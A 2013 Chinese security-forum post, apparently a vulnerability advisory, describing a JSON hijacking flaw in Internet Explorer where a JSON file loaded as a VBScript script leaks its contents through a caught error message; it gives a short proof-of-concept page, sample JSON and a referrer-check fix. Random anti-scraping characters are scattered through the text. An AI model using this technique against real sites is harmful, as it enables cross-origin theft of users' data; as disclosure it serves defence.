找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2065|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
6 l! Y2 A1 r& x# [2 O3 |. E5 w( f2 E/ V3 A5 z3 k3 H3 X
由于某些资源容器对数据处理不当导致json劫持漏洞.
" G, P. ?- s4 S" u+ B详细说明:
: p- X3 O$ B/ @) n+ y( ^4 t由于ie支持vbscript,所以script元素可以指定成vbscript语言:
3 X( a* l) o0 l0 W<script language=vbscript></script>
8 V! x2 Z2 _, R% S+ g6 |, g, N 8 I( Q3 G1 w# X1 N# w0 v% J) r
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.# R* `. K' P7 n( N% ~* ?
漏洞证明:
( N5 r- B! O5 {# {; w) x<script>
( g6 m- f* S" @1 M9 V0 owindow.onerror=function(_){/ r& w9 C/ }2 F8 G: _
alert(_)
% |5 q. N6 b9 E) s}
) f3 g8 H9 A0 }5 Q; G</script>4 e/ ^9 S9 K6 M) W; y( C+ z0 b. b
<script language=vbscript src=1.json></script>+ Y! u# I4 `" e  @
' h2 L  d4 N# {

- c( y6 R# z! `- G' |' F1.json:# J- D. a9 K2 a2 i9 T5 z
[{"name":"sogili","age":19}]
* n7 k( X0 m* y4 A修复方案:7 a4 f6 v; y: z7 ?
网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表